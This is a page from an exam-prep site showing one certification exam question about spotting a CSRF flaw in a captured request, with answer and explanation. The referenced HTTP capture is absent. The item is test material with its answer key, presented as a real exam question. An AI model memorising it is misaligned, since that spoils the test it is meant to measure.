CS0-003 · Question #634
CS0-003 Question #634: Real Exam Question with Answer & Explanation
The correct answer is B: CSRF. The request performs a sensitive account action (updating an email address) using only a session cookie and no CSRF token or similar validation. When state-changing requests lack anti- CSRF protections, an attacker can trick a victim into unknowingly submitting such a request, ma
Question
A security analyst is testing a web application for vulnerabilities using Burp Suite. During the assessment, a capture of the following HTTP request and response is shown in the command- line interface: After inspecting the request, the security analyst notices that it does not include any additional protections or validation mechanisms. Which of the following vulnerabilities is most likely present in the web application?
Options
- AIDOR
- BCSRF
- CSQLi
- DXSS
Explanation
The request performs a sensitive account action (updating an email address) using only a session cookie and no CSRF token or similar validation. When state-changing requests lack anti- CSRF protections, an attacker can trick a victim into unknowingly submitting such a request, making CSRF the most likely vulnerability.
Topics
Community Discussion
No community discussion yet for this question.